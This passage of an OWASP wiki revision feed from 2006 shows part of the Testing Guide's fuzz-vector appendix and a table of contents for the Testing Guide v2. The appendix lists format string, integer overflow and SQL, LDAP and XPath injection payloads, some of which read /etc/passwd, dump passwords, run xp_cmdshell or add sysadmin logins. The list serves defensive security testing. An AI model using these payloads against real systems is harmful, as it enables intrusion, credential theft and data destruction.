&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief overview of category here.&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&amp;diff=13733</id>
		<title>OWASP Testing Guide v2 Table of Contents</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&amp;diff=13733"/>
				<updated>2006-11-27T10:55:47Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /*  Appendix C: Fuzz Vectors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Updated 24th Nov, 12.00 GMT+1 &lt;br /&gt;
 Legend:&amp;lt;br&amp;gt;&lt;br /&gt;
 xx%: Progress status of the paragraph &amp;lt;br&amp;gt;&lt;br /&gt;
 Review: the paragraph need a review (Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
 TD: Paragraph To Be Assigned&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Guide AoC]]&lt;br /&gt;
&lt;br /&gt;
[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Review_Panel Review Panel]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==[[Testing Guide Frontispiece AoC|Frontispiece]]==&lt;br /&gt;
&lt;br /&gt;
'''1.1 About the OWASP Testing Guide Project'''&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.1 Copyright                                        &amp;lt;br&amp;gt;&lt;br /&gt;
1.1.2 Editors	                                         (0%, Review)&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.3 Authors and Reviewers 	                         (0%, Review)&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.4 Revision History&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.5 Trademarks&amp;lt;br&amp;gt;&lt;br /&gt;
'''1.2 About The Open Web Application Security Project''' &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.1 Overview &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.2 Structure &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.3 Licensing &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.4 Participation and Membership &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.5 Projects &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.6 OWASP Privacy Policy &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Testing Guide Introduction AoC|Introduction]]==&lt;br /&gt;
'''2.1 The OWASP Testing Project'''                                       &amp;lt;br&amp;gt;&lt;br /&gt;
'''2.2 Principles of Testing'''                                           &amp;lt;br&amp;gt;&lt;br /&gt;
'''2.3 Testing Techniques Explained'''                                    &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[The OWASP Testing Framework AoC|The OWASP Testing Framework]]==&lt;br /&gt;
'''3.1. Overview'''                                        &amp;lt;br&amp;gt;&lt;br /&gt;
'''3.2. Phase 1 — Before Development Begins '''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.3. Phase 2: During Definition and Design'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.4. Phase 3: During Development'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.5. Phase 4: During Deployment'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.6. Phase 5: Maintenance and Operations'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.7. A Typical SDLC Testing Workflow '''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Web Application Penetration Testing AoC |Web Application Penetration Testing ]]==&lt;br /&gt;
'''4.1 Introduction and objectives'''	                              (Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.2 Information Gathering'''                         (Carlo Pelliccioni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.1 Testing Web Application Fingerprint (Antonio Parata)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.2 Application Discovery (Mauro Bregolin)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.3 Spidering and googling                         (80%,	Tom Brennan, Tom Ryan)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4 Analysis of error codes                         (Carlo Pelliccioni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5 Infrastructure configuration management testing                         &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5.1 SSL/TLS Testing                         (Mauro Bregolin, Mark Curphey)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5.2 DB Listener Testing                         (60%, Eoin Keary, Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6 Application configuration management testing                         (90%)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6.1 File extensions handling                         (Mauro Bregolin)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6.2 Old, backup and unreferenced files                         (Mauro Bregolin, Javier Fernandez Sanguino, Dafydd Studdard)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.3 Business logic testing'''                                        (Madhura Halasgikar)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.4 Authentication Testing'''	                                     (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.1 Default or guessable (dictionary) user account              &amp;lt;br&amp;gt;&lt;br /&gt;
4.4.2 Brute Force                                                  (Giorgio Fedon, Andrea Lombardini)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.3 Bypassing authentication schema                              (Giorgio Fedon, Andrea Lombardini)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.4 Directory traversal/file include                             (Luca Carettoni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.5 Vulnerable remember password and pwd reset                  (Ralph M. Los,Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.6 Logout and Browser Cache Management Testing                                   (Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.5 Session Management Testing'''                                        (Glyn Geoghegan, Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.1 Analysis of the Session Management Schema (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.2 Cookie and Session token Manipulation  (Alberto Revelli, Matteo Meucci) &amp;lt;br&amp;gt;   &lt;br /&gt;
4.5.3 Exposed session variables	                              (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.4 Session Riding (XSRF)  (Mauro Bregolin,Review)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit                                                 (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.6 Data Validation Testing'''                                        (Meucci)		&amp;lt;br&amp;gt;	&lt;br /&gt;
4.6.1 Cross site scripting (80%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.1.1 HTTP Methods and XST (Alberto Revelli) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2 SQL Injection (Antonio Parata) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.1 Stored procedure injection (40%,Gary Burns)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing (0%,TD) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.3 MySQL testing (Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.4 SQL Server testing (Ariel Waissbein, Laura Nuñez, Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.3 LDAP Injection (Stefano Di Paola) &amp;lt;br&amp;gt; &lt;br /&gt;
4.6.4 ORM Injection (Mark Roxberry) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.5 XML Injection (Antonio Parata, Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.6 SSI Injection (Claudio Merloni) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.7 XPath Injection (Antonio Parata, Alberto Revelli, Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.8 IMAP/SMTP Injection (Vicente Aguilera) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.9 Code Injection (100%, Mark Roxberry) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.10 OS Commanding (70%, Gary Burns) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11 Buffer overflow Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.1 Heap overflow &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.2 Stack overflow &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.3 Format string &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.12 Incubated vulnerability testing (95%,Ariel Waissbein, Laura Nuñez) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.7 Denial of Service Testing'''                                           &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.1 Locking Customer Accounts          Review&amp;lt;br&amp;gt;&lt;br /&gt;
4.7.2 Buffer Overflows                                           	&amp;lt;br&amp;gt;	&lt;br /&gt;
4.7.3 User Specified Object Allocation                           &amp;lt;br&amp;gt;		&lt;br /&gt;
4.7.4 User Input as a Loop Counter                               &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.5 Writing User Provided Data to Disk                        &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.6 Failure to Release Resources                              &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.7 Storing too Much Data in Session                          &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.8 Web Services Testing''' (Eoin Keary, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
4.8.1 XML Structural Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.2 XML content-level Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.3 HTTP GET parameters/REST Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.4 Naughty SOAP attachments	&amp;lt;br&amp;gt;&lt;br /&gt;
4.8.5 Replay Testing       &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.9 AJAX Testing'''    (70%, Dan Cornell, Giorgio Fedon, Stefano Di Paola)&amp;lt;br&amp;gt;&lt;br /&gt;
4.9.1 Vulnerabilities (90%, Anush Shetty) &amp;lt;br&amp;gt;&lt;br /&gt;
4.9.2  How to test (60%)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Writing Reports: value the real risk AoC |Writing Reports: value the real risk ]]==&lt;br /&gt;
'''5.1 How to value the real risk'''	                              (90%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
'''5.2 How to write the report of the testing'''	                      (20%, Daniel Cuthbert, Tom Brennan, Tom Ryan)	TD&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==&lt;br /&gt;
(90%)&amp;lt;br&amp;gt;&lt;br /&gt;
* Black Box Testing Tools&lt;br /&gt;
* Source Code Analyzers&lt;br /&gt;
* Other Tools&lt;br /&gt;
&lt;br /&gt;
==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==&lt;br /&gt;
(70%)&amp;lt;br&amp;gt;&lt;br /&gt;
* Whitepapers&amp;lt;br&amp;gt;&lt;br /&gt;
* Books&amp;lt;br&amp;gt;&lt;br /&gt;
* Articles&amp;lt;br&amp;gt;&lt;br /&gt;
* Useful Websites&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==&lt;br /&gt;
(80%)&lt;br /&gt;
&lt;br /&gt;
* Fuzz Categories&lt;br /&gt;
** Recursive fuzzing&lt;br /&gt;
** Replasive fuzzing&lt;br /&gt;
* Cross Site Scripting (XSS)&lt;br /&gt;
* Buffer Overflows (BFO)&lt;br /&gt;
* Format String Errors (FSE)&lt;br /&gt;
* Integer Overflows (INT)&lt;br /&gt;
* Passive SQL Injection (SQP)&lt;br /&gt;
* Active SQL Injection (SQI)&lt;br /&gt;
* LDAP Injection (LDP)&lt;br /&gt;
* XPATH Injection (XPH)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13556</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13556"/>
				<updated>2006-11-22T18:02:44Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
